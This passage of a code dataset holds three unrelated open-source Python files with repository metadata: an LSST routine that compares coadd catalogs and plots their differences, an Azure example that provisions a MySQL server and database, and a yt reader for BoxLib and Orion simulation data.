catStruct2 = self.readAfwCoaddTables(patchRefList2, repoInfo2, haveForced,\n aliasDictList=aliasDictList)\n unforced2 = catStruct2.unforced\n forced2 = catStruct2.forced\n\n forcedStr = \"forced\" if haveForced else \"unforced\"\n # Set boolean array 
indicating sources deemed unsuitable for qa\n # analyses.\n badUnforced1 = makeBadArray(unforced1, onlyReadStars=self.config.onlyReadStars)\n badUnforced2 = makeBadArray(unforced2, onlyReadStars=self.config.onlyReadStars)\n if haveForced:\n badForced1 = makeBadArray(forced1, onlyReadStars=self.config.onlyReadStars)\n badForced2 = makeBadArray(forced2, onlyReadStars=self.config.onlyReadStars)\n\n # Purge the catalogs of flagged sources\n unforced1 = unforced1[~badUnforced1].copy(deep=True)\n unforced2 = unforced2[~badUnforced2].copy(deep=True)\n if haveForced:\n forced1 = forced1[~badForced1].copy(deep=True)\n forced2 = forced2[~badForced2].copy(deep=True)\n else:\n forced1 = unforced1\n forced2 = unforced2\n self.log.info(\"\\nNumber of sources in unforced catalogs: first = {0:d} and second = {1:d}\".\n format(len(unforced1), len(unforced2)))\n self.log.info(\"\\nNumber of sources in forced catalogs: first = {0:d} and second = {1:d}\".\n format(len(forced1), len(forced2)))\n\n unforced = matchAndJoinCatalogs(unforced1, unforced2, self.matchRadius, matchXy=self.config.matchXy,\n camera1=repoInfo1.camera, camera2=repoInfo2.camera)\n forced = matchAndJoinCatalogs(forced1, forced2, self.matchRadius, matchXy=self.config.matchXy,\n camera1=repoInfo1.camera, camera2=repoInfo2.camera)\n self.log.info(\"Number [fraction] of matches (maxDist = {0:.2f}{1:s}) = {2:d} [{3:d}%] (unforced) \"\n \"{4:d} [{5:d}%] (forced)\".\n format(self.matchRadius, self.matchRadiusUnitStr,\n len(unforced), int(100*len(unforced)/len(unforced1)),\n len(forced), int(100*len(forced)/len(forced1))))\n\n self.catLabel = \" scarlet\" if \"first_deblend_scarletFlux\" in getSchema(unforced) else \" nChild = 0\"\n forcedStr = forcedStr + \" \" + self.catLabel\n schema = getSchema(forced)\n\n subdir = \"patch-\" + str(patchList1[0]) if len(patchList1) == 1 else subdir\n # Always highlight points with x-axis flag set (for cases where\n # they do not get explicitly filtered out).\n highlightList = [(self.config.analysis.fluxColumn.replace(\"_instFlux\", \"_flag\"), 0, \"turquoise\"), ]\n # Dict of all parameters common to plot* functions\n plotKwargs1 = dict(matchRadius=self.matchRadius, matchRadiusUnitStr=self.matchRadiusUnitStr,\n zpLabel=self.zpLabel, highlightList=highlightList, uberCalLabel=self.uberCalLabel)\n plotInfoDict = getPlotInfo(repoInfo1)\n try:\n rerun2Str = list(repoInfo2.butler.storage.repositoryCfgs)[0]\n except AttributeError:\n rootDir = str(repoInfo2.butler.datastore.root)\n rootDir = rootDir.replace(\"file://\", \"\")\n rerun2Str = rootDir + repoInfo2.butler.collections[0]\n plotInfoDict.update(dict(patchList=patchList1, patchIdList=patchIdList1, hscRun=hscRun,\n tractInfo=repoInfo1.tractInfo,\n dataId=repoInfo1.dataId, plotType=\"plotCompareCoadd\", subdir=subdir,\n hscRun1=repoInfo1.hscRun, hscRun2=repoInfo2.hscRun,\n rerun2=rerun2Str))\n\n if self.config.doPlotMags:\n fluxToPlotList = [flux for flux in self.config.fluxToPlotList]\n for gaapFlux in self.config.gaapFluxList:\n haveGaap = gaapFlux + \"_instFlux\" in schema\n if haveGaap:\n fluxToPlotList.append(gaapFlux)\n plotList.append(self.plotMags(forced, plotInfoDict, areaDict1, forcedStr=forcedStr,\n fluxToPlotList=fluxToPlotList, **plotKwargs1))\n\n if self.config.doPlotSizes:\n if (\"first_base_SdssShape_psf_xx\" in schema and \"second_base_SdssShape_psf_xx\" in schema):\n plotList.append(self.plotSizes(forced, plotInfoDict, areaDict1, forcedStr=forcedStr,\n **plotKwargs1))\n else:\n self.log.warning(\"Cannot run plotSizes: base_SdssShape_psf_xx not 
in schema\")\n\n if self.config.doApCorrs:\n plotList.append(self.plotApCorrs(unforced, plotInfoDict, areaDict1,\n forcedStr=\"unforced \" + self.catLabel, **plotKwargs1))\n if self.config.doPlotCentroids:\n plotList.append(self.plotCentroids(forced, plotInfoDict, areaDict1, forcedStr=forcedStr,\n **plotKwargs1))\n if self.config.doPlotStarGalaxy:\n plotList.append(self.plotStarGal(forced, plotInfoDict, areaDict1, forcedStr=forcedStr,\n **plotKwargs1))\n\n self.allStats, self.allStatsHigh = savePlots(plotList, \"plotCompareCoadd\", repoInfo1.dataId,\n repoInfo1.butler, subdir=subdir)\n\n def plotMags(self, catalog, plotInfoDict, areaDict, matchRadius=None, matchRadiusUnitStr=None,\n zpLabel=None, forcedStr=None, fluxToPlotList=None, postFix=\"\",\n highlightList=None, uberCalLabel=None):\n yield\n schema = getSchema(catalog)\n if not fluxToPlotList:\n fluxToPlotList = self.config.fluxToPlotList\n unitStr = \"mmag\" if self.config.toMilli else \"mag\"\n enforcer = None # Enforcer(requireLess={\"star\": {\"stdev\": 0.02*self.unitScale}})\n for col in fluxToPlotList:\n if (\"first_\" + col + \"_instFlux\" in schema and \"second_\" + col + \"_instFlux\" in schema):\n shortName = \"diff_\" + col + postFix\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, MagDiffCompare(col + \"_instFlux\", unitScale=self.unitScale),\n \" Run Comparison: %s mag diff (%s)\" %\n (fluxToPlotString(col), unitStr), shortName, self.config.analysis,\n prefix=\"first_\", qMin=-0.05, qMax=0.05,\n errFunc=MagDiffCompareErr(col + \"_instFlux\", unitScale=self.unitScale),\n labeller=OverlapsStarGalaxyLabeller(),\n unitScale=self.unitScale,).plotAll(shortName, plotInfoDict, areaDict,\n self.log, enforcer=enforcer,\n matchRadius=matchRadius,\n matchRadiusUnitStr=matchRadiusUnitStr,\n zpLabel=zpLabel,\n uberCalLabel=uberCalLabel,\n forcedStr=forcedStr,\n highlightList=highlightList)\n\n def plotCentroids(self, catalog, plotInfoDict, areaDict, matchRadius=None, matchRadiusUnitStr=None,\n zpLabel=None, forcedStr=None, highlightList=None, uberCalLabel=None):\n yield\n unitStr = \"milliPixels\" if self.config.toMilli else \"pixels\"\n distEnforcer = None\n centroidStr1, centroidStr2 = \"base_SdssCentroid\", \"base_SdssCentroid\"\n if bool(plotInfoDict[\"hscRun1\"]) ^ bool(plotInfoDict[\"hscRun2\"]):\n if not plotInfoDict[\"hscRun1\"]:\n centroidStr1 = \"base_SdssCentroid_Rot\"\n if not plotInfoDict[\"hscRun2\"]:\n centroidStr2 = \"base_SdssCentroid_Rot\"\n plotAllKwargs = dict(matchRadius=matchRadius, matchRadiusUnitStr=matchRadiusUnitStr, zpLabel=zpLabel,\n forcedStr=forcedStr, uberCalLabel=uberCalLabel)\n\n shortName = \"diff_x\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, CentroidDiff(\"x\", centroid1=centroidStr1, centroid2=centroidStr2,\n unitScale=self.unitScale),\n \"Run Comparison: x offset (%s)\" % unitStr, shortName,\n self.config.analysis, prefix=\"first_\",\n qMin=-0.08, qMax=0.08, errFunc=None,\n labeller=OverlapsStarGalaxyLabeller()).\\\n plotAll(shortName, plotInfoDict, areaDict, self.log, enforcer=distEnforcer, **plotAllKwargs)\n shortName = \"diff_y\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, CentroidDiff(\"y\", centroid1=centroidStr1, centroid2=centroidStr2,\n unitScale=self.unitScale),\n \"Run Comparison: y offset (%s)\" % unitStr, shortName, self.config.analysis,\n prefix=\"first_\", qMin=-0.08, qMax=0.08, errFunc=None,\n labeller=OverlapsStarGalaxyLabeller()).plotAll(shortName, 
plotInfoDict,\n areaDict, self.log,\n enforcer=distEnforcer,\n **plotAllKwargs)\n\n unitStr = \"mas\" if self.config.toMilli else \"arcsec\"\n shortName = \"diff_raCosDec\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, AstrometryDiff(\"first_coord_ra\", \"second_coord_ra\",\n declination1=\"first_coord_dec\",\n declination2=\"second_coord_dec\",\n unitScale=self.unitScale),\n r\" Run Comparison: $\\delta_{RA}$ = $\\Delta$RA*cos(Dec) (%s)\" % unitStr,\n shortName, self.config.analysisAstromMatches, prefix=\"first_\",\n qMin=-0.2*matchRadius, qMax=0.2*matchRadius,\n labeller=OverlapsStarGalaxyLabeller(), unitScale=self.unitScale,\n ).plotAll(shortName, plotInfoDict, areaDict, self.log, **plotAllKwargs)\n shortName = \"diff_ra\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, AstrometryDiff(\"first_coord_ra\", \"second_coord_ra\", declination1=None,\n declination2=None, unitScale=self.unitScale),\n r\"Run Comparison: $\\Delta$RA (%s)\" % unitStr, shortName,\n self.config.analysisAstromMatches, prefix=\"first_\", qMin=-0.25*matchRadius,\n qMax=0.25*matchRadius, labeller=OverlapsStarGalaxyLabeller(),\n unitScale=self.unitScale,\n ).plotAll(shortName, plotInfoDict, areaDict, self.log, **plotAllKwargs)\n shortName = \"diff_dec\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, AstrometryDiff(\"first_coord_dec\", \"second_coord_dec\",\n unitScale=self.unitScale),\n r\"$\\delta_{Dec}$ (%s)\" % unitStr, shortName, self.config.analysisAstromMatches,\n prefix=\"first_\", qMin=-0.3*matchRadius, qMax=0.3*matchRadius,\n labeller=OverlapsStarGalaxyLabeller(),\n unitScale=self.unitScale,\n ).plotAll(shortName, plotInfoDict, areaDict, self.log, **plotAllKwargs)\n\n def plotFootprint(self, catalog, plotInfoDict, areaDict, matchRadius=None, matchRadiusUnitStr=None,\n zpLabel=None, forcedStr=None, postFix=\"\", highlightList=None,\n uberCalLabel=None):\n yield\n enforcer = None\n plotAllKwargs = dict(matchRadius=matchRadius, matchRadiusUnitStr=matchRadiusUnitStr,\n zpLabel=zpLabel, forcedStr=forcedStr, uberCalLabel=uberCalLabel, postFix=postFix)\n shortName = \"diff_footArea\"\n col = \"base_FootprintArea_value\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, FootAreaDiffCompare(col), \" Run Comparison: Footprint Area difference\",\n shortName, self.config.analysis, prefix=\"first_\", qMin=-250, qMax=250,\n labeller=OverlapsStarGalaxyLabeller()\n ).plotAll(shortName, plotInfoDict, areaDict, self.log, enforcer=enforcer,\n **plotAllKwargs)\n shortName = \"diff_footArea_calib_psf_used\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, FootAreaDiffCompare(col),\n \" Run Comparison: Footprint Area diff (psf_used)\",\n shortName, self.config.analysis, prefix=\"first_\", goodKeys=[\"calib_psf_used\"],\n qMin=-150, qMax=150, labeller=OverlapsStarGalaxyLabeller(),\n ).plotAll(shortName, plotInfoDict, areaDict, self.log, enforcer=enforcer,\n highlightList=highlightList, **plotAllKwargs)\n\n def plotSizes(self, catalog, plotInfoDict, areaDict, matchRadius=None, matchRadiusUnitStr=None,\n zpLabel=None, forcedStr=None, highlightList=None, uberCalLabel=None):\n yield\n schema = getSchema(catalog)\n enforcer = None # Enforcer(requireLess={\"star\": {\"stdev\": 0.02*self.unitScale}})\n plotAllKwargs = dict(matchRadius=matchRadius, matchRadiusUnitStr=matchRadiusUnitStr,\n zpLabel=zpLabel, forcedStr=forcedStr, 
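# [Editorial sketch] AstrometryDiff above scales RA offsets by cos(Dec) so an offset means the same on-sky separation at any declination. With made-up values (radians):\ndef _sketchRaCosDecOffset():\n    import numpy as np\n    ra1, ra2, dec = 1.00000, 1.00002, 0.8\n    return (ra1 - ra2) * np.cos(dec)  # the delta_RA*cos(Dec) quantity plotted here\n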
uberCalLabel=uberCalLabel)\n for col in [\"base_PsfFlux\"]:\n if (\"first_\" + col + \"_instFlux\" in schema and \"second_\" + col + \"_instFlux\" in schema):\n # Make comparison plots for all objects and calib_psf_used\n # only objects.\n for goodFlags in [[], [\"calib_psf_used\"]]:\n subCatString = \" (calib_psf_used)\" if \"calib_psf_used\" in goodFlags else \"\"\n shortNameBase = \"trace\"\n shortName = (shortNameBase + \"_calib_psf_used\" if \"calib_psf_used\" in goodFlags else\n shortNameBase)\n compareCol = \"base_SdssShape\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, TraceSizeCompare(compareCol),\n \" SdssShape Trace Radius Diff (%)\" + subCatString,\n shortName, self.config.analysis, prefix=\"first_\",\n goodKeys=goodFlags, qMin=-0.5, qMax=1.5,\n labeller=OverlapsStarGalaxyLabeller()).plotAll(shortName,\n plotInfoDict, areaDict,\n self.log,\n enforcer=enforcer,\n **plotAllKwargs)\n\n shortNameBase = \"psfTrace\"\n shortName = (shortNameBase + \"_calib_psf_used\" if \"calib_psf_used\" in goodFlags else\n shortNameBase)\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, TraceSizeCompare(compareCol + \"_psf\"),\n \" SdssShape PSF Trace Radius Diff (%)\" + subCatString,\n shortName, self.config.analysis, prefix=\"first_\",\n goodKeys=goodFlags, qMin=-1.1, qMax=1.1,\n labeller=OverlapsStarGalaxyLabeller(),\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n enforcer=enforcer, **plotAllKwargs)\n\n if \"first_ext_shapeHSM_HsmSourceMoments_xx\" in schema:\n shortNameBase = \"hsmTrace\"\n shortName = (shortNameBase + \"_calib_psf_used\" if \"calib_psf_used\" in goodFlags else\n shortNameBase)\n compareCol = \"ext_shapeHSM_HsmSourceMoments\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, TraceSizeCompare(compareCol),\n \" HSM Trace Radius Diff (%)\" + subCatString, shortName,\n self.config.analysis, prefix=\"first_\",\n goodKeys=goodFlags, qMin=-0.5, qMax=1.5,\n labeller=OverlapsStarGalaxyLabeller(),\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n enforcer=enforcer, **plotAllKwargs)\n shortNameBase = \"hsmPsfTrace\"\n shortName = (shortNameBase + \"_calib_psf_used\" if \"calib_psf_used\" in goodFlags else\n shortNameBase)\n if \"first_ext_shapeHSM_PsfMoments_xx\" in schema:\n compareCol = \"ext_shapeHSM_HsmPsfMoments\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, TraceSizeCompare(compareCol),\n \" HSM PSF Trace Radius Diff (%)\" + subCatString,\n shortName, self.config.analysis, prefix=\"first_\",\n goodKeys=goodFlags, qMin=-1.1, qMax=1.1,\n labeller=OverlapsStarGalaxyLabeller(),\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n enforcer=enforcer, **plotAllKwargs)\n\n compareCol = \"base_SdssShape\"\n shortName = \"sdssXx\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, PercentDiff(compareCol + \"_xx\"), \"SdssShape xx Moment Diff (%)\",\n shortName, self.config.analysis, prefix=\"first_\",\n qMin=-0.5, qMax=1.5, labeller=OverlapsStarGalaxyLabeller(),\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n enforcer=enforcer, **plotAllKwargs)\n shortName = \"sdssYy\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, PercentDiff(compareCol + \"_yy\"), \"SdssShape yy Moment Diff (%)\",\n shortName, self.config.analysis, prefix=\"first_\",\n qMin=-0.5, qMax=1.5, labeller=OverlapsStarGalaxyLabeller(),\n ).plotAll(shortName, 
plotInfoDict, areaDict, self.log, enforcer=enforcer,\n **plotAllKwargs)\n\n def plotStarGal(self, catalog, plotInfoDict, areaDict, matchRadius=None, matchRadiusUnitStr=None,\n zpLabel=None, forcedStr=None, highlightList=None, uberCalLabel=None):\n yield\n schema = getSchema(catalog)\n enforcer = None\n plotAllKwargs = dict(matchRadius=matchRadius, matchRadiusUnitStr=matchRadiusUnitStr, zpLabel=zpLabel,\n forcedStr=forcedStr, highlightList=highlightList, uberCalLabel=uberCalLabel)\n baseCol = \"ext_shapeHSM_HsmShapeRegauss\"\n col = baseCol + \"_resolution\"\n if \"first_\" + col in schema:\n shortName = \"diff_resolution\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, PercentDiff(col),\n \" Run Comparison: HsmRegauss Resolution (% diff)\",\n shortName, self.config.analysis, prefix=\"first_\",\n qMin=-0.2, qMax=0.2, labeller=OverlapsStarGalaxyLabeller()\n ).plotAll(shortName, plotInfoDict, areaDict, self.log, enforcer=enforcer,\n **plotAllKwargs)\n col = baseCol + \"_e1\"\n if \"first_\" + col in schema:\n shortName = \"diff_HsmShapeRegauss_e1\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, PercentDiff(col), \" Run Comparison: HsmRegauss e1 (% diff)\",\n shortName, self.config.analysis, prefix=\"first_\",\n qMin=-0.2, qMax=0.2, labeller=OverlapsStarGalaxyLabeller()\n ).plotAll(shortName, plotInfoDict, areaDict, self.log, enforcer=enforcer,\n **plotAllKwargs)\n col = baseCol + \"_e2\"\n if \"first_\" + col in schema:\n shortName = \"diff_HsmShapeRegauss_e2\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, PercentDiff(col), \" Run Comparison: HsmRegauss e2 (% diff)\",\n shortName, self.config.analysis, prefix=\"first_\",\n qMin=-0.2, qMax=0.2, labeller=OverlapsStarGalaxyLabeller()\n ).plotAll(shortName, plotInfoDict, areaDict, self.log, enforcer=enforcer,\n **plotAllKwargs)\n\n def plotApCorrs(self, catalog, plotInfoDict, areaDict, matchRadius=None, matchRadiusUnitStr=None,\n zpLabel=None, forcedStr=None, fluxToPlotList=None, highlightList=None, uberCalLabel=None):\n yield\n schema = getSchema(catalog)\n if not fluxToPlotList:\n fluxToPlotList = self.config.fluxToPlotList\n unitStr = \"mmag\" if self.config.toMilli else \"mag\"\n enforcer = None # Enforcer(requireLess={\"star\": {\"stdev\": 0.02*self.unitScale}})\n for col in fluxToPlotList:\n if \"first_\" + col + \"_apCorr\" in schema and \"second_\" + col + \"_apCorr\" in schema:\n shortName = \"diff_\" + col + \"_apCorr\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n # apCorrs in coadds can be all nan if they weren't run in sfm,\n # so add a check for valid data but here so we don't encounter\n # the fatal error in Analysis.\n if (len(np.where(np.isfinite(catalog[\"first_\" + col + \"_apCorr\"]))[0]) > 0\n and len(np.where(np.isfinite(catalog[\"second_\" + col + \"_apCorr\"]))[0]) > 0):\n yield from Analysis(catalog, MagDiffCompare(col + \"_apCorr\", unitScale=self.unitScale),\n \" Run Comparison: %s apCorr diff (%s)\" %\n (fluxToPlotString(col), unitStr),\n shortName, self.config.analysis, prefix=\"first_\", qMin=-0.025,\n qMax=0.025, labeller=OverlapsStarGalaxyLabeller(),\n unitScale=self.unitScale\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n enforcer=enforcer, matchRadius=matchRadius,\n matchRadiusUnitStr=matchRadiusUnitStr,\n zpLabel=zpLabel, forcedStr=forcedStr,\n highlightList=highlightList\n + [(col + \"_flag_apCorr\", 0, \"lime\"), ],\n uberCalLabel=uberCalLabel)\n else:\n 
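# [Editorial sketch] The finite-value guard in plotApCorrs above protects Analysis from all-NaN aperture-correction columns. The same check in isolation:\ndef _sketchHasFinite():\n    import numpy as np\n    col = np.array([np.nan, np.nan, 0.3])\n    return len(np.where(np.isfinite(col))[0]) > 0  # True -> at least one usable value\n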
self.log.warning(\"No valid data points for shortName = {:s}. Skipping...\".\n format(shortName))\n\n def _getConfigName(self):\n return None\n\n def _getMetadataName(self):\n return None\n\n def _getEupsVersionsName(self):\n return None\n","repo_name":"lsst-dm/pipe_analysis","sub_path":"python/lsst/pipe/analysis/coaddAnalysis.py","file_name":"coaddAnalysis.py","file_ext":"py","file_size_in_byte":189940,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"81300602","text":"import random, os\nfrom azure.identity import AzureCliCredential\nfrom azure.mgmt.resource import ResourceManagementClient\nfrom azure.mgmt.rdbms.mysql import MySQLManagementClient\nfrom azure.mgmt.rdbms.mysql.models import ServerForCreate, ServerPropertiesForDefaultCreate, ServerVersion\n\n# Acquire a credential object using CLI-based authentication.\ncredential = AzureCliCredential()\n\n# Retrieve subscription ID from environment variable\nsubscription_id = os.environ[\"AZURE_SUBSCRIPTION_ID\"]\n\n# Constants we need in multiple places: the resource group name and the region\n# in which we provision resources. You can change these values however you want.\nRESOURCE_GROUP_NAME = 'PythonAzureExample-DB-rg'\nLOCATION = \"westus\"\n\n# Step 1: Provision the resource group.\nresource_client = ResourceManagementClient(credential, subscription_id)\n\nrg_result = resource_client.resource_groups.create_or_update(RESOURCE_GROUP_NAME,\n { \"location\": LOCATION })\n\nprint(f\"Provisioned resource group {rg_result.name}\")\n\n# For details on the previous code, see Example: Provision a resource group\n# at https://docs.microsoft.com/azure/developer/python/azure-sdk-example-resource-group\n\n\n# Step 2: Provision the database server\n\n# We use a random number to create a reasonably unique database server name.\n# If you've already provisioned a database and need to re-run the script, set\n# the DB_SERVER_NAME environment variable to that name instead.\n#\n# Also set DB_USER_NAME and DB_USER_PASSWORD variables to avoid using the defaults.\n\ndb_server_name = os.environ.get(\"DB_SERVER_NAME\", f\"PythonAzureExample-MySQL-{random.randint(1,100000):05}\")\ndb_admin_name = os.environ.get(\"DB_ADMIN_NAME\", \"azureuser\")\ndb_admin_password = os.environ.get(\"DB_ADMIN_PASSWORD\", \"ChangePa$$w0rd24\")\n\n# Obtain the management client object\nmysql_client = MySQLManagementClient(credential, subscription_id)\n\n# Provision the server and wait for the result\npoller = mysql_client.servers.begin_create(RESOURCE_GROUP_NAME,\n db_server_name, \n ServerForCreate(\n location=LOCATION,\n properties=ServerPropertiesForDefaultCreate(\n administrator_login=db_admin_name,\n administrator_login_password=db_admin_password,\n version=ServerVersion.FIVE7\n )\n )\n)\n\nserver = poller.result()\n\nprint(f\"Provisioned MySQL server {server.name}\")\n\n# Step 3: Provision a firewall rule to allow the local workstation to connect\n\nRULE_NAME = \"allow_ip\"\nip_address = os.environ[\"PUBLIC_IP_ADDRESS\"]\n\n# For the above code, create an environment variable named PUBLIC_IP_ADDRESS that\n# contains your workstation's public IP address as reported by a site like\n# https://whatismyipaddress.com/.\n\n# Provision the rule and wait for completion\npoller = mysql_client.firewall_rules.begin_create_or_update(RESOURCE_GROUP_NAME,\n db_server_name, RULE_NAME, \n { \"start_ip_address\": ip_address, \"end_ip_address\": ip_address } \n)\n\nfirewall_rule = poller.result()\n\nprint(f\"Provisioned firewall rule 
{firewall_rule.name}\")\n\n\n# Step 4: Provision a database on the server\n\ndb_name = os.environ.get(\"DB_NAME\", \"example-db1\")\n \npoller = mysql_client.databases.begin_create_or_update(RESOURCE_GROUP_NAME,\n db_server_name, db_name, {})\n\ndb_result = poller.result()\n\nprint(f\"Provisioned MySQL database {db_result.name} with ID {db_result.id}\")\n","repo_name":"MicrosoftDocs/python-sdk-docs-examples","sub_path":"db/provision_db.py","file_name":"provision_db.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"42056542026","text":"import os\nfrom collections import defaultdict\n\nimport numpy as np\n\nfrom yt.frontends.chombo.io import parse_orion_sinks\nfrom yt.funcs import mylog\nfrom yt.geometry.selection_routines import GridSelector\nfrom yt.utilities.io_handler import BaseIOHandler\n\n\ndef _remove_raw(all_fields, raw_fields):\n centered_fields = set(all_fields)\n for raw in raw_fields:\n centered_fields.discard(raw)\n return list(centered_fields)\n\n\nclass IOHandlerBoxlib(BaseIOHandler):\n _dataset_type = \"boxlib_native\"\n\n def __init__(self, ds, *args, **kwargs):\n super().__init__(ds)\n\n def _read_fluid_selection(self, chunks, selector, fields, size):\n chunks = list(chunks)\n if any((not (ftype == \"boxlib\" or ftype == \"raw\") for ftype, fname in fields)):\n raise NotImplementedError\n rv = {}\n raw_fields = []\n for field in fields:\n if field[0] == \"raw\":\n nodal_flag = self.ds.nodal_flags[field[1]]\n num_nodes = 2 ** sum(nodal_flag)\n rv[field] = np.empty((size, num_nodes), dtype=\"float64\")\n raw_fields.append(field)\n else:\n rv[field] = np.empty(size, dtype=\"float64\")\n centered_fields = _remove_raw(fields, raw_fields)\n ng = sum(len(c.objs) for c in chunks)\n mylog.debug(\n \"Reading %s cells of %s fields in %s grids\",\n size,\n [f2 for f1, f2 in fields],\n ng,\n )\n ind = 0\n for chunk in chunks:\n data = self._read_chunk_data(chunk, centered_fields)\n for g in chunk.objs:\n for field in fields:\n if field in centered_fields:\n ds = data[g.id].pop(field)\n else:\n ds = self._read_raw_field(g, field)\n nd = g.select(selector, ds, rv[field], ind)\n ind += nd\n data.pop(g.id)\n return rv\n\n def _read_raw_field(self, grid, field):\n field_name = field[1]\n base_dir = self.ds.index.raw_file\n\n nghost = self.ds.index.raw_field_nghost[field_name]\n box_list = self.ds.index.raw_field_map[field_name][0]\n fn_list = self.ds.index.raw_field_map[field_name][1]\n offset_list = self.ds.index.raw_field_map[field_name][2]\n\n lev = grid.Level\n filename = os.path.join(base_dir, f\"Level_{lev}\", fn_list[grid.id])\n offset = offset_list[grid.id]\n box = box_list[grid.id]\n\n lo = box[0] - nghost\n hi = box[1] + nghost\n shape = hi - lo + 1\n with open(filename, \"rb\") as f:\n f.seek(offset)\n f.readline() # always skip the first line\n arr = np.fromfile(f, \"float64\", np.prod(shape))\n arr = arr.reshape(shape, order=\"F\")\n return arr[\n tuple(\n slice(None) if (nghost[dim] == 0) else slice(nghost[dim], -nghost[dim])\n for dim in range(self.ds.dimensionality)\n )\n ]\n\n def _read_chunk_data(self, chunk, fields):\n data = {}\n grids_by_file = defaultdict(list)\n if len(chunk.objs) == 0:\n return data\n for g in chunk.objs:\n if g.filename is None:\n continue\n grids_by_file[g.filename].append(g)\n dtype = self.ds.index._dtype\n bpr = dtype.itemsize\n for filename in grids_by_file:\n grids = grids_by_file[filename]\n grids.sort(key=lambda a: a._offset)\n f = 
open(filename, \"rb\")\n for grid in grids:\n data[grid.id] = {}\n local_offset = grid._get_offset(f) - f.tell()\n count = grid.ActiveDimensions.prod()\n size = count * bpr\n for field in self.ds.index.field_order:\n if field in fields:\n # We read it ...\n f.seek(local_offset, os.SEEK_CUR)\n v = np.fromfile(f, dtype=dtype, count=count)\n v = v.reshape(grid.ActiveDimensions, order=\"F\")\n data[grid.id][field] = v\n local_offset = 0\n else:\n local_offset += size\n f.close()\n return data\n\n def _read_particle_coords(self, chunks, ptf):\n yield from (\n (ptype, xyz, 0.0)\n for ptype, xyz in self._read_particle_fields(chunks, ptf, None)\n )\n\n def _read_particle_fields(self, chunks, ptf, selector):\n for chunk in chunks: # These should be organized by grid filename\n for g in chunk.objs:\n for ptype, field_list in sorted(ptf.items()):\n npart = g._pdata[ptype][\"NumberOfParticles\"]\n if npart == 0:\n continue\n\n fn = g._pdata[ptype][\"particle_filename\"]\n offset = g._pdata[ptype][\"offset\"]\n pheader = self.ds.index.particle_headers[ptype]\n\n with open(fn, \"rb\") as f:\n # read in the position fields for selection\n f.seek(offset + pheader.particle_int_dtype.itemsize * npart)\n rdata = np.fromfile(\n f, pheader.real_type, pheader.num_real * npart\n )\n\n # Allow reading particles in 1, 2, and 3 dimensions,\n # setting the appropriate default for unused dimensions.\n pos = []\n for idim in [1, 2, 3]:\n if g.ds.dimensionality >= idim:\n pos.append(\n np.asarray(\n rdata[idim - 1 :: pheader.num_real],\n dtype=np.float64,\n )\n )\n else:\n center = 0.5 * (\n g.LeftEdge[idim - 1] + g.RightEdge[idim - 1]\n )\n pos.append(np.full(npart, center, dtype=np.float64))\n x, y, z = pos\n\n if selector is None:\n # This only ever happens if the call is made from\n # _read_particle_coords.\n yield ptype, (x, y, z)\n continue\n mask = selector.select_points(x, y, z, 0.0)\n if mask is None:\n continue\n for field in field_list:\n # handle the case that this is an integer field\n int_fnames = [\n fname for _, fname in pheader.known_int_fields\n ]\n if field in int_fnames:\n ind = int_fnames.index(field)\n f.seek(offset)\n idata = np.fromfile(\n f, pheader.int_type, pheader.num_int * npart\n )\n data = np.asarray(\n idata[ind :: pheader.num_int], dtype=np.float64\n )\n yield (ptype, field), data[mask].flatten()\n\n # handle case that this is a real field\n real_fnames = [\n fname for _, fname in pheader.known_real_fields\n ]\n if field in real_fnames:\n ind = real_fnames.index(field)\n data = np.asarray(\n rdata[ind :: pheader.num_real], dtype=np.float64\n )\n yield (ptype, field), data[mask].flatten()\n\n\nclass IOHandlerOrion(IOHandlerBoxlib):\n _dataset_type = \"orion_native\"\n\n _particle_filename = None\n\n @property\n def particle_filename(self):\n fn = os.path.join(self.ds.output_dir, \"StarParticles\")\n if not os.path.exists(fn):\n fn = os.path.join(self.ds.output_dir, \"SinkParticles\")\n self._particle_filename = fn\n return self._particle_filename\n\n _particle_field_index = None\n\n @property\n def particle_field_index(self):\n index = parse_orion_sinks(self.particle_filename)\n\n self._particle_field_index = index\n return self._particle_field_index\n\n def _read_particle_selection(self, chunks, selector, fields):\n rv = {}\n chunks = list(chunks)\n\n if isinstance(selector, GridSelector):\n if not (len(chunks) == len(chunks[0].objs) == 1):\n raise RuntimeError\n\n grid = chunks[0].objs[0]\n\n for ftype, fname in fields:\n rv[ftype, fname] = self._read_particles(grid, fname)\n\n return 
